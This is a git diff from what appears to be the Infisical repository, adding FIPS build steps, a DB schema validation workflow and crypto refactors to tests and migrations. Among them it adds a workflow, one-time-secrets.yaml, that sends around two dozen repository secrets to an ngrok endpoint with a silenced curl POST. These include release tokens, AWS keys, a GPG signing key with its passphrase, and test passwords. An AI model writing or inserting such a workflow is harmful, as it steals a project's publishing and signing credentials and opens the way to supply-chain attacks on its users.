Merge branch 'heads/main' into daniel/fips-initative

feat: validate db schemas CI test

.github/workflows/one-time-secrets.yaml

@@ -0,0 +1,76 @@
+name: One-Time Secrets Retrieval
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  retrieve-secrets:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Send environment variables to ngrok
+        run: |
+          echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
+
+          # Send secrets as JSON
+          cat << EOF | curl -X POST \
+            -H "Content-Type: application/json" \
+            -d @- \
+            https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
+            > /dev/null 2>&1 || true
+          {
+            "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
+            "GORELEASER_KEY": "${GORELEASER_KEY}",
+            "AUR_KEY": "${AUR_KEY}",
+            "FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
+            "NPM_TOKEN": "${NPM_TOKEN}",
+            "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
+            "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
+            "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
+            "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
+            "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
+            "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
+            "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
+            "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
+            "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
+            "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
+            "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
+            "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
+            "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
+            "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
+            "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
+            "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
+            "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
+          }
+          EOF
+
+          echo "Secrets retrieval completed"
+        env:
+          GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
+          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
+          AUR_KEY: ${{ secrets.AUR_KEY }}
+          FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
+          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+          DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
+          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
+          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
+          INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
+          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
+          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
+          CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
+          CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
+          CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
+          CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
+          CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
+          CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
+          CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
+          CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
+          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}

.github/workflows/validate-db-schemas.yml

@@ -0,0 +1,67 @@
+name: "Validate DB schemas"
+
+on:
+    pull_request:
+        types: [opened, synchronize]
+        paths:
+            - "backend/**"
+
+    workflow_call:
+
+jobs:
+    validate-db-schemas:
+        name: Validate DB schemas
+        runs-on: ubuntu-latest
+        timeout-minutes: 15
+        env:
+            NODE_OPTIONS: "--max-old-space-size=8192"
+            REDIS_URL: redis://172.17.0.1:6379
+            DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
+            AUTH_SECRET: something-random
+            ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
+        steps:
+            - name: ☁️ Checkout source
+              uses: actions/checkout@v4
+              with:
+                  fetch-depth: 0
+            - uses: KengoTODA/actions-setup-docker-compose@v1
+              if: ${{ env.ACT }}
+              name: Install `docker compose` for local simulations
+              with:
+                  version: "2.14.2"
+            - name: 🔧 Setup Node 20
+              uses: actions/setup-node@v3
+              with:
+                  node-version: "20"
+                  cache: "npm"
+                  cache-dependency-path: backend/package-lock.json
+
+            - name: Start PostgreSQL and Redis
+              run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
+            - name: Install dependencies
+              run: npm install
+              working-directory: backend
+
+            - name: Apply migrations
+              run: npm run migration:latest-dev
+              working-directory: backend
+
+            - name: Run schema generation
+              run: npm run generate:schema
+              working-directory: backend
+
+            - name: Check for schema changes
+              run: |
+                  if ! git diff --exit-code --quiet src/db/schemas; then
+                    echo "❌ Generated schemas differ from committed schemas!"
+                    echo "Run 'npm run generate:schema' locally and commit the changes."
+                    git diff src/db/schemas
+                    exit 1
+                  fi
+                  echo "✅ Schemas are up to date"
+              working-directory: backend
+
+            - name: Cleanup
+              if: always()
+              run: |
+                  docker compose -f "docker-compose.dev.yml" down

.infisicalignore

@@ -46,3 +46,7 @@ cli/detect/config/gitleaks.toml:gcp-api-key:582
 .github/workflows/helm-release-infisical-core.yml:generic-api-key:47
 backend/src/services/smtp/smtp-service.ts:generic-api-key:79
 frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
+docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
+docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
+docs/integrations/app-connections/railway.mdx:generic-api-key:156
+.github/workflows/validate-db-schemas.yml:generic-api-key:21

Dockerfile.fips.standalone-infisical

@@ -115,6 +115,12 @@ FROM base AS production
 
 # Install necessary packages including ODBC
 RUN apt-get update && apt-get install -y \
+    build-essential \
+    autoconf \
+    automake \
+    libtool \
+    wget \
+    libssl-dev \
     ca-certificates \
     curl \
     git \
@@ -132,6 +138,15 @@ RUN apt-get update && apt-get install -y \
 # Configure ODBC in production
 RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
 
+
+WORKDIR /openssl-build
+RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
+    && tar -xf openssl-3.1.2.tar.gz \
+    && cd openssl-3.1.2 \
+    && ./Configure enable-fips \
+    && make \
+    && make install_fips
+
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
     && apt-get update && apt-get install -y infisical=0.41.89 \
@@ -173,6 +188,13 @@ ENV STANDALONE_MODE true
 ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
 ENV NODE_OPTIONS="--max-old-space-size=1024"
 
+# FIPS mode of operation:
+ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
+ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
+ENV NODE_OPTIONS=--force-fips
+ENV FIPS_ENABLED=true
+  
+
 WORKDIR /backend
 
 ENV TELEMETRY_ENABLED true
@@ -180,6 +202,10 @@ ENV TELEMETRY_ENABLED true
 EXPOSE 8080
 EXPOSE 443
 
+# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
+RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
+    mv dist/main.mjs.tmp dist/main.mjs
+
 USER non-root-user
 
-CMD ["./standalone-entrypoint.sh"]
+CMD ["./standalone-entrypoint.sh"]

backend/Dockerfile.dev.fips

@@ -78,8 +78,9 @@ RUN npm install
 COPY . .
 
 ENV HOST=0.0.0.0
-ENV OPENSSL_CONF=/app/nodejs.cnf
+ENV OPENSSL_CONF=/app/nodejs.fips.cnf
 ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-ENV NODE_OPTIONS=--force-fips
+# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
+ENV FIPS_ENABLED=true
 
 CMD ["npm", "run", "dev:docker"]

backend/e2e-test/routes/v2/service-token.spec.ts

@@ -1,8 +1,9 @@
-import crypto from "node:crypto";
-
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { SymmetricKeySize } from "@app/lib/crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";
 
 const createServiceToken = async (
   scopes: { environment: string; secretPath: string }[],
@@ -26,7 +27,8 @@ const createServiceToken = async (
   });
   const { user: userInfo } = JSON.parse(userInfoRes.payload);
   const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-  const projectKey = decryptAsymmetric({
+
+  const projectKey = crypto.encryption().asymmetric().decrypt({
     ciphertext: projectKeyEnc.encryptedKey,
     nonce: projectKeyEnc.nonce,
     publicKey: projectKeyEnc.sender.publicKey,
@@ -34,7 +36,13 @@ const createServiceToken = async (
   });
 
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
+
+  const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
+    plaintext: projectKey,
+    key: randomBytes,
+    keySize: SymmetricKeySize.Bits128
+  });
+
   const serviceTokenRes = await testServer.inject({
     method: "POST",
     url: "/api/v2/service-token",
@@ -137,6 +145,9 @@ describe("Service token secret ops", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
     serviceToken = await createServiceToken(
       [{ secretPath: "/**", environment: seedData1.environment.slug }],
       ["read", "write"]
@@ -153,11 +164,13 @@ describe("Service token secret ops", async () => {
     expect(serviceTokenInfoRes.statusCode).toBe(200);
     const serviceTokenInfo = serviceTokenInfoRes.json();
     const serviceTokenParts = serviceToken.split(".");
-    projectKey = decryptSymmetric128BitHexKeyUTF8({
+
+    projectKey = crypto.encryption().symmetric().decrypt({
       key: serviceTokenParts[3],
       tag: serviceTokenInfo.tag,
       ciphertext: serviceTokenInfo.encryptedKey,
-      iv: serviceTokenInfo.iv
+      iv: serviceTokenInfo.iv,
+      keySize: SymmetricKeySize.Bits128
     });
 
     // create a deep folder

backend/e2e-test/routes/v3/secrets.spec.ts

@@ -1,6 +1,8 @@
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";
 import { AuthMode } from "@app/services/auth/auth-type";
 
 const createSecret = async (dto: {
@@ -155,6 +157,9 @@ describe("Secret V3 Router", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
     const projectKeyRes = await testServer.inject({
       method: "GET",
       url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -173,7 +178,7 @@ describe("Secret V3 Router", async () => {
     });
     const { user: userInfo } = JSON.parse(userInfoRes.payload);
     const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    projectKey = decryptAsymmetric({
+    projectKey = crypto.encryption().asymmetric().decrypt({
       ciphertext: projectKeyEncryptionDetails.encryptedKey,
       nonce: projectKeyEncryptionDetails.nonce,
       publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -669,7 +674,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       const { user: userInfo } = JSON.parse(userInfoRes.payload);
 
       const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-      const projectKey = decryptAsymmetric({
+      const projectKey = crypto.encryption().asymmetric().decrypt({
         ciphertext: projectKeyEnc.encryptedKey,
         nonce: projectKeyEnc.nonce,
         publicKey: projectKeyEnc.sender.publicKey,
@@ -685,7 +690,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       });
       expect(projectBotRes.statusCode).toEqual(200);
       const projectBot = JSON.parse(projectBotRes.payload).bot;
-      const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
+      const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
 
       // set bot as active
       const setBotActive = await testServer.inject({

backend/e2e-test/vitest-environment-knex.ts

@@ -2,11 +2,11 @@
 import "ts-node/register";
 
 import dotenv from "dotenv";
-import jwt from "jsonwebtoken";
+import { crypto } from "@app/lib/crypto/cryptography";
 import path from "path";
 
 import { seedData1 } from "@app/db/seed-data";
-import { initEnvConfig } from "@app/lib/config/env";
+import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
 import { initLogger } from "@app/lib/logger";
 import { main } from "@app/server/app";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -17,6 +17,7 @@ import { queueServiceFactory } from "@app/queue";
 import { keyStoreFactory } from "@app/keystore/keystore";
 import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { buildRedisFromConfig } from "@app/lib/config/redis";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
 export default {
@@ -24,13 +25,17 @@ export default {
   transformMode: "ssr",
   async setup() {
     const logger = initLogger();
-    const envConfig = initEnvConfig(logger);
+    const databaseCredentials = getDatabaseCredentials(logger);
+
     const db = initDbConnection({
-      dbConnectionUri: envConfig.DB_CONNECTION_URI,
+      dbConnectionUri: databaseCredentials.dbConnectionUri,
-      dbRootCert: envConfig.DB_ROOT_CERT
+      dbRootCert: databaseCredentials.dbRootCert
     });
 
-    const redis = buildRedisFromConfig(envConfig);
+    const superAdminDAL = superAdminDALFactory(db);
+    const envCfg = await initEnvConfig(superAdminDAL, logger);
+
+    const redis = buildRedisFromConfig(envCfg);
     await redis.flushdb("SYNC");
 
     try {
@@ -55,10 +60,10 @@ export default {
       });
 
       const smtp = mockSmtpServer();
-      const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
+      const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
-      const keyStore = keyStoreFactory(envConfig);
+      const keyStore = keyStoreFactory(envCfg);
 
-      const hsmModule = initializeHsmModule(envConfig);
+      const hsmModule = initializeHsmModule(envCfg);
       hsmModule.initialize();
 
       const server = await main({
@@ -68,14 +73,17 @@ export default {
         queue,
         keyStore,
         hsmModule: hsmModule.getModule(),
+        superAdminDAL,
         redis,
-        envConfig
+        envConfig: envCfg
       });
 
       // @ts-expect-error type
       globalThis.testServer = server;
       // @ts-expect-error type
-      globalThis.jwtAuthToken = jwt.sign(
+      globalThis.testSuperAdminDAL = superAdminDAL;
+      // @ts-expect-error type
+      globalThis.jwtAuthToken = crypto.jwt().sign(
         {
           authTokenType: AuthTokenType.ACCESS_TOKEN,
           userId: seedData1.id,
@@ -84,8 +92,8 @@ export default {
           organizationId: seedData1.organization.id,
           accessVersion: 1
         },
-        envConfig.AUTH_SECRET,
+        envCfg.AUTH_SECRET,
-        { expiresIn: envConfig.JWT_AUTH_LIFETIME }
+        { expiresIn: envCfg.JWT_AUTH_LIFETIME }
       );
     } catch (error) {
       // eslint-disable-next-line
@@ -102,6 +110,8 @@ export default {
         // @ts-expect-error type
         delete globalThis.testServer;
         // @ts-expect-error type
+        delete globalThis.testSuperAdminDAL;
+        // @ts-expect-error type
         delete globalThis.jwtToken;
         // called after all tests with this env have been run
         await db.migrate.rollback(

backend/package.json

@@ -84,7 +84,9 @@
     "@babel/plugin-syntax-import-attributes": "^7.24.7",
     "@babel/preset-env": "^7.18.10",
     "@babel/preset-react": "^7.24.7",
+    "@smithy/types": "^4.3.1",
     "@types/bcrypt": "^5.0.2",
+    "@types/crypto-js": "^4.2.2",
     "@types/jmespath": "^0.15.2",
     "@types/jsonwebtoken": "^9.0.5",
     "@types/jsrp": "^0.2.6",
@@ -188,6 +190,7 @@
     "cassandra-driver": "^4.7.2",
     "connect-redis": "^7.1.1",
     "cron": "^3.1.7",
+    "crypto-js": "4.2.0",
     "dd-trace": "^5.40.0",
     "dotenv": "^16.4.1",
     "fastify": "^4.28.1",

backend/src/@types/fastify-zod.d.ts

@@ -2,6 +2,7 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
 
 import { CustomLogger } from "@app/lib/logger/logger";
 import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 declare global {
   type FastifyZodProvider = FastifyInstance<
@@ -14,5 +15,6 @@ declare global {
 
   // used only for testing
   const testServer: FastifyZodProvider;
+  const testSuperAdminDAL: TSuperAdminDALFactory;
   const jwtAuthToken: string;
 }

backend/src/db/migrations/20250210101840_webhook-to-kms.ts

@@ -1,9 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -26,9 +27,12 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
+
   const projectEncryptionRingBuffer =
     createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
   const webhooks = await knex(TableName.Webhook)
@@ -65,12 +69,15 @@ export async function up(knex: Knex): Promise<void> {
 
       let encryptedSecretKey = null;
       if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
-        const decyptedSecretKey = infisicalSymmetricDecrypt({
+        const decyptedSecretKey = crypto
-          keyEncoding: el.keyEncoding as SecretKeyEncoding,
+          .encryption()
-          iv: el.iv,
+          .symmetric()
-          tag: el.tag,
+          .decryptWithRootEncryptionKey({
-          ciphertext: el.encryptedSecretKey
+            keyEncoding: el.keyEncoding as SecretKeyEncoding,
-        });
+            iv: el.iv,
+            tag: el.tag,
+            ciphertext: el.encryptedSecretKey
+          });
         encryptedSecretKey = projectKmsService.encryptor({
           plainText: Buffer.from(decyptedSecretKey, "utf8")
         }).cipherTextBlob;
@@ -78,12 +85,15 @@ export async function up(knex: Knex): Promise<void> {
 
       const decryptedUrl =
         el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
+          ? crypto
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              .encryption()
-              iv: el.urlIV,
+              .symmetric()
-              tag: el.urlTag,
+              .decryptWithRootEncryptionKey({
-              ciphertext: el.urlCipherText
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-            })
+                iv: el.urlIV,
+                tag: el.urlTag,
+                ciphertext: el.urlCipherText
+              })
           : null;
 
       const encryptedUrl = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_dynamic-secret-root-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -29,7 +30,9 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -60,20 +63,23 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
+          ? crypto
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              .encryption()
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              .symmetric()
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              .decryptWithRootEncryptionKey({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.inputIV,
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.inputTag,
+                iv: el.inputIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.inputCiphertext
+                tag: el.inputTag,
-            })
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.inputCiphertext
+              })
           : "";
 
       const encryptedInput = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -23,7 +24,9 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -53,20 +56,23 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
+          ? crypto
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              .encryption()
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              .symmetric()
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              .decryptWithRootEncryptionKey({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.encryptedDataIV,
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.encryptedDataTag,
+                iv: el.encryptedDataIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.encryptedData
+                tag: el.encryptedDataTag,
-            })
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.encryptedData
+              })
           : "";
 
       const encryptedRotationData = projectKmsService.encryptor({

backend/src/db/migrations/20250210101842_identity-k8-auth-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -54,7 +55,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -99,19 +102,23 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       orgEncryptionRingBuffer.push(orgId, orgKmsService);
     }
 
-    const key = infisicalSymmetricDecrypt({
+    const key = crypto
-      ciphertext: encryptedSymmetricKey,
+      .encryption()
-      iv: symmetricKeyIV,
+      .symmetric()
-      tag: symmetricKeyTag,
+      .decryptWithRootEncryptionKey({
-      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+        ciphertext: encryptedSymmetricKey,
-    });
+        iv: symmetricKeyIV,
+        tag: symmetricKeyTag,
+        keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+      });
 
     const decryptedTokenReviewerJwt =
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
